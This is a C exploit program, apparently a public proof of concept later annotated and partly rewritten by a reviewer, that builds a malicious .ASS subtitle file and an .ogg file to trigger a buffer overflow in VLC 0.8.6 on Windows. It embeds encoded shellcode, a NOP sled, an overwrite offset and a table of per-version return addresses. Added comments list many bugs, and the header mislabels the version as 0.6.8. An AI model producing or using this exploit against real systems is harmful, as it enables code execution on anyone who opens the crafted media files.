/*[%]VLC vs 0.6.8 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
|
|
[%]Works every time, works on any win32 OS, tested on Windows XP SP2.
|
|
|
|
[%]My doctor said that I have serious problems, but I think he's full of it
|
|
because the voices tell me I'm ok!*/
|
|
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<stdint.h>
|
|
|
|
/* Names of the two files this tool writes (see buildF and oggf). */
#define File "subtitle666.ass"
#define OGGfile "openme.ogg"

/* Control-flow shorthands.
 * IF names its second parameter `NULL`, so inside the expansion NULL is
 * the macro argument rather than the standard constant; every call in
 * this file passes NULL, so each one expands to `if(x==NULL)`.
 * FOR and WHILE do not declare their index: FOR(i,...) in gen_random
 * iterates through the file-scope `int i`. WHILE is unused here. */
#define IF(x,NULL) if(x==NULL)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define WHILE(z) while(z>0)

/* Not a host byte-order probe: it reads the first stored byte of whatever
 * `i` is in scope at the expansion site (in reverseInt that is the value
 * being converted), so it is true exactly when that byte is zero. */
#define is_bigendian() ((*(char*)&i)==0)

/* Byte offsets into buffer b. Only EIP_OFFSET is referenced in the
 * visible code (buildF); SEH_OFFSET and NEXTSEH_OFFSET are unused. */
#define EIP_OFFSET 163852
#define SEH_OFFSET 165248
#define NEXTSEH_OFFSET 165244
|
|
/*-------------prototypes---------*/
|
|
//100% working shellcode
|
|
char vlcshellcode[]=
|
|
{
|
|
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d"
|
|
"\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c"
|
|
"\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90"
|
|
"\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4"
|
|
"\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf"
|
|
"\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd"
|
|
"\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52"
|
|
"\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1"
|
|
"\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b"
|
|
"\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9"
|
|
};
|
|
/* Skeleton of the generated subtitle file: an Aegisub-style
 * [Script Info]/[V4+ Styles]/[Events] header ending in an unterminated
 * "Dialogue:" line. buildF emits this array with fprintf("%s") and then
 * the contents of buffer b directly after it.
 * Note: buildF later calls free(data) on this file-scope array, which is
 * undefined behaviour because it was never obtained from malloc. */
char data[]=
{
"[Script Info]\n"
"; Script generated by Aegisub\n"
"; http://www.aegisub.net\n"
"Title: Neon Genesis Evangelion - Episode 26 (neutral Spanish)\n"
"Original Script: RoRo\n"
"Script Updated By: version 2.8.01\n"
"ScriptType: v4.00+\n"
"Collisions: Normal\n"
"PlayResY: 600\n"
"PlayDepth: 0\n"
"Timer: 100,0000\n"
"Video Aspect Ratio: 0\n"
"Video Zoom: 6\n"
"Video Position: 0\n"
"[V4+ Styles]\n"
"Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding\n"
"Style: DefaultVCD, Arial,28,&H00B4FCFC,&H00B4FCFC,&H00000008,&H80000008,-1,0,0,0,100,100,0.00,0.00,1,1.00,2.00,2,30,30,30,0\n"
"[Events]\n"
"Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text\n"
"Dialogue:"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // only 16 bytes of 0x41 live here; the original comment claimed 165254, but the bulk is appended from b by buildF
};

/* Banner printed by main when no argument is given. */
char banner[]=
{
"******************************************************************\n"
" VLC 0.6.8x Buffer overflow exploit(win32 universal) *\n"
" *\n"
" by fl0 fl0w *\n"
"******************************************************************\n"
};

/* Usage text printed after the banner. It lists targets 1-4, while
 * main's switch also accepts 0 and Targetprint numbers entries 0-4. */
char arguments[]=
{
"---------------------------\n"
"Too few args! \n"
"sploit.exe [target 1/2/3/4]\n"
"---------------------------\n"
};
|
|
|
|
// data + 165254 nop + shellcode + szJMP(strcat)
|
|
/*--------extern variables----------*/
|
|
/*--------extern variables----------*/
/* Work buffers. Only `b` is used in the visible code (filled by buildF);
 * c, d and f are never referenced. */
char b[1000000];
char c[1000000];
char d[1000000];
char f[1000000]; // unused here; the original comment reads "1402 bytes nop"

/* Address byte strings; declared but not referenced in the visible code. */
char seh[]="\x87\x75\x40\x4B";
char nseh[]="\x38\xFA\x74\x02";

/* File-scope loop index, written by the FOR macro in gen_random. */
int i;
/* Target index taken from argv[1] by main via atoi(), without range check. */
int input;
/* Receives the address bytes from cpy(). cpy copies len+1 = 5 bytes, so
 * its last write lands one byte past the end of this 4-byte array. */
char bf[4];
/* File-scope loop index used by Targetprint. */
int t;

/*-------prototypes----------*/
/* Note the mismatches: buildF is declared with an empty parameter list,
 * defined with an unsigned int parameter, and called from main with the
 * char array b. reverseInt has no prototype here and is defined after
 * main, so its calls rely on an implicit declaration. */
int buildF();
int cpy(unsigned int,char*);
void print(char*);
void gen_random(char*, const int);
unsigned int getFsize(FILE*,char*);
int cpystr(char* dest,int,int);
int oggf(char* fname);
int Targetprint();

/*--------ogg file format---------*/
/* Ogg page header fields in file order. The field widths sum to 28 bytes,
 * but with the uint64_t member naturally aligned the struct is almost
 * certainly padded (likely to 32 bytes) - check sizeof(ogg) before relying
 * on the 28-byte figure. oggf fills one of these and writes it to disk. */
typedef struct aa
{ // field widths sum to 28 bytes / 224 bits before padding
    uint32_t Cp; // Capture pattern - 32 bits
    uint8_t Ver; // Version - 8 bits
    uint8_t H; // Header type - 8 bits
    uint64_t Gp; // Granule position - 64 bits
    uint32_t Bsn; // Bitstream serial number - 32 bits
    uint32_t Psn; // Page sequence number - 32 bits
    uint32_t C; // Checksum - 32 bits
    uint8_t Ps; // Page segments - 8 bits
    uint8_t St; // Segment table - 8 bits
}ogg;

/*------targets------------*/
/* Per-build target table: an address plus a description, terminated by
 * an entry whose fields are both NULL (NULL is a pointer constant being
 * stored into the unsigned int field, which compilers accept with a
 * warning). main's switch handles indices 0-4; Targetprint prints five
 * entries; the terminator is not checked by main before indexing. */
struct
{
    unsigned int eip;
    char* etype;
}RET[]=
{
    {
        0x026DFA38,
        "VLC 0.8.6 c"
    },
    {
        0x0263FA38,
        "VLC 0.8.6 b,d"
    },
    {
        0x0267FA38,
        "VLC 0.8.6 a"
    },
    {
        0x0267FA38,
        "VLC 0.8.6 b test1"
    },
    {
        0x02B6FA38,
        "VLC 0.8.6 RC1"
    },
    {
        NULL,NULL
    }
};
|
|
/*------main--------*/
|
|
/*
 * Entry point. With no argument it clears the screen, prints the banner
 * and usage text, lists the target table and exits. Otherwise argv[1]
 * selects a RET entry, whose address bytes are copied into bf, and the
 * two output files are written before waiting for a key press.
 *
 * Review notes on the visible code:
 *  - system("CLS") spawns a shell to run a Windows-only command; flagged
 *    as a shell-out in a tool that otherwise only does file I/O.
 *  - atoi() yields 0 for non-numeric input and nothing checks the range.
 *    The switch has no default, so any value outside 0..4 leaves bf
 *    untouched, and RET[input] below reads past the 6-entry table for
 *    input > 5 or negative input.
 *  - reverseInt() is defined after main with no prototype above, and its
 *    return value is discarded in every case, so those calls do nothing.
 *  - buildF is called with the char array b, but its definition takes an
 *    unsigned int it never reads; the empty-parameter prototype hides the
 *    mismatch from the compiler.
 */
int main(int argc,char* argv[])
{
    if(argc<2)
    {
        system("CLS"); /* shell-out; see note above */
        printf("%s%s",banner,arguments);
        Targetprint();exit(0);
    }

    input=atoi(argv[1]); /* unvalidated; see note above */

    switch(input) /* the five cases differ only in the index used */
    {
        case 0:
        reverseInt(RET[0].eip); /* result discarded */
        cpy(RET[0].eip,bf);
        break;

        case 1:
        reverseInt(RET[1].eip); /* result discarded */
        cpy(RET[1].eip,bf);
        break;

        case 2:
        reverseInt(RET[2].eip); /* result discarded */
        cpy(RET[2].eip,bf);
        break;

        case 3:
        reverseInt(RET[3].eip); /* result discarded */
        cpy(RET[3].eip,bf);
        break;

        case 4:
        reverseInt(RET[4].eip); /* result discarded */
        cpy(RET[4].eip,bf);
        break;
    }
    /* Out-of-bounds read of RET when input is outside 0..5. */
    printf("[!]Using : %s retaddress\n",RET[input].etype);
    /* buildF ignores its argument; getchar keeps the console open. */
    buildF(b); oggf(OGGfile); getchar();

    return 0;
}
|
|
/*
 * Write the subtitle file named by File: the `data` header followed by
 * buffer b. b is first filled with 165267 random alphanumerics (NUL at
 * b[165267]) and then overwritten at EIP_OFFSET with the bytes in bf,
 * ten 0x90 bytes and vlcshellcode (length taken with strlen, i.e. up to
 * the first NUL byte). Returns 0, or exits if the file cannot be opened.
 *
 * retn is never read: main passes the array b, the prototype declares no
 * parameters, and this definition takes an unsigned int.
 *
 * Review notes:
 *  - free(data) frees a file-scope array that was never malloc'd: this is
 *    undefined behaviour and aborts or corrupts the heap on typical C
 *    runtimes.
 *  - The final printf has no conversion for its second argument, so the
 *    size is computed but never printed. getFsize reopens the file by
 *    name and ignores the FILE* it is given, so the already-closed `f`
 *    is not dereferenced.
 */
int buildF(unsigned int retn)
{
    FILE *f=fopen(File,"wb");

    IF(f,NULL)
    {
        print("File .ass error!"); exit(0);}
    gen_random(b,165267); /*EIP offset 165267 bytes [EIP][NOP nopoffset=164667 bytes][SHELLCODE nopoffset+nrbytes nop]*/
    memcpy(b+EIP_OFFSET,bf,4);
    memset(b+EIP_OFFSET+4,0x90,10);
    memcpy(b+EIP_OFFSET+4+10,vlcshellcode,strlen(vlcshellcode)); /* strlen: up to the first NUL */

    fprintf(f,"%s%s",data,b); /* both arrays are emitted as C strings */

    free(data); fclose(f); /* free() of a non-heap array: undefined behaviour */

    printf("[#]ASS file DONE!\n",getFsize(f,File)); /* size argument has no %-conversion and is not printed */

    return 0;
}
|
|
/*
 * Write one Ogg page header to the file named fname. The Cp value
 * 0x5367674F is the ASCII bytes "OggS" when stored little-endian.
 * Returns 0, or exits if the file cannot be opened.
 *
 * Review notes:
 *  - malloc's result is not checked before the field writes.
 *  - fwrite(W666, sizeof(W666), 9, g): sizeof(W666) is the size of the
 *    pointer, not the struct, so 9 * sizeof(ogg *) bytes (36 on a 32-bit
 *    build, 72 on 64-bit) are read from an allocation of sizeof(ogg)
 *    bytes - a heap over-read whose excess bytes end up in the file.
 *  - W666 is never freed, and the final printf has no conversion for the
 *    size argument (getFsize reopens the file by name, so the closed `g`
 *    is not used).
 */
int oggf(char* fname)
{
    FILE* g=fopen(fname,"wb");
    IF(g,NULL)
    {
        print("File ogg error");
        exit(0);
    }
    ogg *W666;
    W666=(ogg*)malloc(sizeof(ogg)); /* unchecked allocation */
    W666->Cp=0x5367674F; /* "OggS" in little-endian byte order */
    W666->Ver=0x00;
    W666->H=0x02;
    W666->Gp=0x00000000;
    W666->Bsn=0x000060B8;
    W666->Psn=0x00000000;
    W666->C=0xA403D2F8;
    W666->Ps=0x01;
    W666->St=0x1E;

    fwrite(W666,sizeof(W666),9,g); /* sizeof of the pointer, times 9: reads past the allocation */

    fclose(g);

    printf("[#]OGG file DONE!\n",getFsize(g,OGGfile)); /* size argument has no %-conversion and is not printed */

    return 0;
}
|
|
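/*
 * Copy the in-memory byte representation of `source` into `dest`, in host
 * byte order. Writes exactly 4 bytes (the compile-time assert below pins
 * the assumption), so dest must have room for 4. Returns the number of
 * bytes written.
 *
 * The original copied len+1 = 5 bytes: one byte read past the 4-byte
 * `source` object and one byte written past the caller's 4-byte `bf`.
 */
int cpy(unsigned int source,char* dest)
{
    _Static_assert(sizeof(unsigned int) == 4, "cpy assumes a 32-bit unsigned int");
    const int len = 4;

    if (dest == NULL) {
        return 0; /* nothing written */
    }
    memcpy(dest, &source, (size_t)len);
    return len;
}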
|
|
/* Write msg to stdout as a status line of the form "[*]<msg>\n". */
void print(char* msg)
{
    fputs("[*]", stdout);
    fputs(msg, stdout);
    fputc('\n', stdout);
}
|
|
|
|
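/*
 * Fill s[0..len-1] with pseudo-random ASCII alphanumerics and NUL-terminate
 * at s[len]; s must hold at least len+1 bytes.
 *
 * Uses rand(); nothing in this file calls srand(), so the sequence is the
 * same on every run. A NULL buffer or negative len is rejected (the
 * original would have written s[len] out of bounds for len < 0). The
 * original iterated through the file-scope `i` via the FOR macro; this
 * version uses a local index and leaves `i` alone.
 */
void gen_random(char *s, const int len)
{
    static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    const size_t nsym = sizeof alphanum - 1; /* exclude the terminator */

    if (s == NULL || len < 0) {
        return;
    }
    for (int k = 0; k < len; ++k) {
        s[k] = alphanum[(size_t)rand() % nsym];
    }
    s[len] = '\0';
}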
|
|
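/*
 * Return the size in bytes of the file named gname, or print a message and
 * exit(0) if it cannot be opened (the same error policy as the other file
 * operations in this tool). Returns 0 if seeking or telling fails.
 *
 * The FILE* parameter is kept for the existing callers but is not used:
 * both call sites pass a handle they have already fclose()d, so the file
 * is always reopened by name. The original overwrote that parameter with
 * the new handle, never closed it (a FILE leak per call), and stored
 * ftell()'s long - which may be -1 - into an unsigned int unchecked.
 */
unsigned int getFsize(FILE* g,char* gname)
{
    (void)g; /* intentionally unused, see above */

    FILE *fp = fopen(gname, "rb");
    if (fp == NULL) {
        print("File error at reading");
        exit(0);
    }

    unsigned int size = 0;
    if (fseek(fp, 0, SEEK_END) == 0) {
        long pos = ftell(fp);
        if (pos >= 0) {
            size = (unsigned int)pos;
        }
    }
    fclose(fp);
    return size;
}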
|
|
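/* True when the host stores the most significant byte of a multi-byte
 * integer first. Uses memcpy rather than a pointer cast so the probe
 * stays within the aliasing rules. */
static int host_is_big_endian(void)
{
    const unsigned int probe = 1u;
    unsigned char first_byte = 0;
    memcpy(&first_byte, &probe, 1);
    return first_byte == 0;
}

/*
 * Convert a 32-bit value between host byte order and big-endian order:
 * a no-op on a big-endian host, a full byte reversal on a little-endian
 * one. Returns the result as int (the declared return type); a value above
 * INT_MAX converts in an implementation-defined way, so callers should
 * cast back to unsigned int. main() currently discards the result.
 *
 * Fixes two defects in the original: is_bigendian() in this file reads
 * the first stored byte of `i` itself instead of probing the host, so an
 * input whose first byte was zero (e.g. 0x00000100 on x86) came back
 * unswapped; and `(int)c1 << 24` overflowed a signed int whenever the
 * low byte was 0x80 or more.
 */
int reverseInt(unsigned int i)
{
    _Static_assert(sizeof(unsigned int) == 4, "reverseInt assumes a 32-bit unsigned int");

    if (host_is_big_endian()) {
        return (int)i;
    }
    const unsigned int swapped = (i << 24)
                               | ((i & 0x0000FF00u) << 8)
                               | ((i >> 8) & 0x0000FF00u)
                               | (i >> 24);
    return (int)swapped;
}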
|
|
/* Fill dest with len+1 copies of the byte value `str` (memset semantics:
 * str is converted to unsigned char) and return len. The write covers one
 * byte more than the returned count, so dest must hold len+1 bytes.
 * Not called anywhere in the visible code. */
int cpystr(char* dest,int str,int len)
{
    const size_t fill_count = (size_t)len + 1u;
    (void)memset(dest, str, fill_count);
    return len;
}
|
|
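/*
 * Print the RET target table, one entry per line, as
 * "[!]<description> - [0x<address>] - <index>", preceded by a header.
 *
 * Walks the table up to its NULL-terminated entry instead of the original
 * hard-coded count of 5, prints the address with %08X (the original used
 * %d on an unsigned value, which printed it in decimal after a literal
 * "0x"), and uses a local index rather than the file-scope `t`.
 * Returns 0; the original was declared int but returned nothing.
 */
int Targetprint()
{
    print("Targets are:");
    for (int k = 0; RET[k].etype != NULL; ++k) {
        printf("[!]%s - [0x%08X] - %d\n", RET[k].etype, RET[k].eip, k);
    }
    return 0;
}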